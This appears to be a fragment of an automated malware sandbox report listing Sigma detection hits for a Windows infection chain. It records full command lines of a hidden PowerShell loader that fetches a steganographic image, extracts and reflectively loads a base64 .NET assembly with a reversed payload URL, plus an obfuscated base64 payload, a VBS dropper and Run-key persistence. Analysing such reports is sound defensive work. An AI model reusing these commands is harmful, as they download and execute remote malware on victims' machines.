gTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }",
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs", ProcessId: 2624, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Name_File.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3140, TargetFilename: C:\ProgramData\Name_File.vbs
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.187.200, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2624, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49728
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6412, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs, ProcessId: 3140, ProcessName: powershell.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }",
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }",
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs", ProcessId: 2624, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTr